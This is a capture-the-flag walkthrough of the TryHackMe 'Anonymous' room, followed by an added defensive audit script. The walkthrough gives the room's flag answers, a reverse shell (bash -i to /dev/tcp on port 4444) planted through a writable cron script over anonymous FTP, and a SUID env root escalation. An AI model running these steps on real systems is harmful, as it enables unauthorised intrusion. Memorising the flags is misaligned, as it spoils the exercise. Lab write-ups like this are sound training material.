Anonymous: TryHackMe Walkthrough Writeup.
Task 1: Pwn
#1. Enumerate the machine. How many ports are open?
Answer: 4
nmap -vvv 10.10.197.76
#2. What service is running on port 21?
Answer: ftp
As we can see in the scan output above, ftp is running on port 21.
#3. What service is running on ports 139 and 445?
Answer: smb
nmap -A 10.10.197.76
#4. There’s a share on the user’s computer. What’s it called?
Answer: pics
For this task we can use enum4linux with the “-S” option, which lists the shares on the user’s computer:
./enum4linux.pl -S 10.10.197.76
#5. user.txt
Answer: 90d6f992585815ff991e68748c414740
To find the user.txt file we can connect to the ftp service that is running, using the anonymous login.
Anonymous File Transfer Protocol (FTP) allows people to download public files from a remote server or website without logging in with a specific account. They use an FTP program or command, enter “anonymous” as the username, and then either supply a given password, make one up, or simply press “Enter”.
I used the get command with a dash at the end to read the clean.sh file directly on the system instead of downloading it, as shown below:
get clean.sh -
Upon exploring the scripts directory we can see that there is a file named “clean.sh” and that we have read, write and execute access to it. The script is designed to inspect the tmp directory, delete files, and record the results in the removed_files.log file. Based on the log’s contents, it appears that the clean.sh script executes quite frequently, possibly every minute. We need to create our own clean.sh script and upload it to the FTP server in the hope that the cron job will run our script instead of the existing cleanup script.
So, now we can create our own clean.sh file locally containing the command shown below, and then put the file on the server.
#!/bin/bash
bash -i >& /dev/tcp/"YOUR_IP"/4444 0>&1
Now, log back into the FTP server and PUT the file, using the commands:
ftp 10.10.197.76
cd scripts
put clean.sh
Start the netcat listener in another terminal using the command:
nc -lvnp 4444
Wait a minute or so and the listener will receive a shell like the one shown below:
Here we get the user.txt file and the flag is “90d6f992585815ff991e68748c414740”.
#6. root.txt
Answer: 4d930091c31a622a7ed10f27999af363
Privilege Escalation: To get root-level permissions I checked which programs owned by root have the SUID bit set. To get a list of all SUID binaries, execute the following command:
find / -user root -perm -u=s 2>/dev/null
Searching GTFOBins for env (https://gtfobins.github.io/gtfobins/env/) gives us a potential privilege escalation:
So run the following command:
env /bin/sh -p
And voilà! We get the root.txt file with the flag “4d930091c31a622a7ed10f27999af363”.
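Both footholds above come from misconfigurations an administrator can audit for: a cron-run script (clean.sh) that other users can overwrite, and a SUID bit on a general-purpose binary (env). The script below is an added defender-side check, not part of this writeup or the room; every path, file name and crontab line in it is constructed for the demo and is an assumption, not taken from the box.

```shell
#!/bin/sh
# Added defender-side audit, not from the original writeup or the room. It looks for
# the two misconfigurations the box relies on: a cron-run script that non-root
# users can modify, and the SUID bit on a general-purpose binary such as env.
# Every path, file name and crontab line below is constructed for the demo.

# flag_writable_cron_scripts CRONFILE
# Print each existing file referenced by an absolute path in CRONFILE that is
# group- or world-writable: cron will run whatever a writer puts in it.
flag_writable_cron_scripts() (
    set -f   # no globbing: the '*' time fields must stay literal
    grep -v '^[[:space:]]*#' "$1" | while read -r line; do
        for tok in $line; do
            case "$tok" in
                /*) if [ -f "$tok" ] && [ -n "$(find "$tok" \( -perm -020 -o -perm -002 \) 2>/dev/null)" ]; then
                        echo "$tok"
                    fi ;;
            esac
        done
    done | sort -u
)

# flag_risky_suid LISTFILE
# LISTFILE holds one path per line, e.g. the output of
#   find / -perm -4000 -type f 2>/dev/null
# Print entries whose name is a shell, interpreter or exec wrapper (env runs any
# command with its own effective uid), since SUID on these hands out the owner's uid.
flag_risky_suid() {
    while read -r path; do
        case "${path##*/}" in
            env|sh|bash|dash|python*|perl|find|vim|awk) echo "$path" ;;
        esac
    done < "$1"
}

# Demo on constructed data in a scratch directory; nothing touches the real cron.
demo() {
    d=$(mktemp -d)
    mkdir -p "$d/scripts"
    printf '#!/bin/sh\necho cleanup\n' > "$d/scripts/clean.sh";  chmod 777 "$d/scripts/clean.sh"
    printf '#!/bin/sh\necho backup\n'  > "$d/scripts/backup.sh"; chmod 755 "$d/scripts/backup.sh"
    printf '# m h dom mon dow user command\n* * * * * root %s/scripts/clean.sh > /dev/null\n0 2 * * * root %s/scripts/backup.sh\n' "$d" "$d" > "$d/crontab"
    printf '/usr/bin/env\n/usr/bin/passwd\n/usr/bin/sudo\n' > "$d/suid.txt"
    echo "writable cron scripts:"; flag_writable_cron_scripts "$d/crontab"   # only clean.sh
    echo "risky SUID binaries:";   flag_risky_suid "$d/suid.txt"            # only /usr/bin/env
    rm -rf "$d"
}
demo
```

On a real host, point flag_writable_cron_scripts at /etc/crontab and the files under /etc/cron.d, and feed flag_risky_suid the output of the find command in its comment.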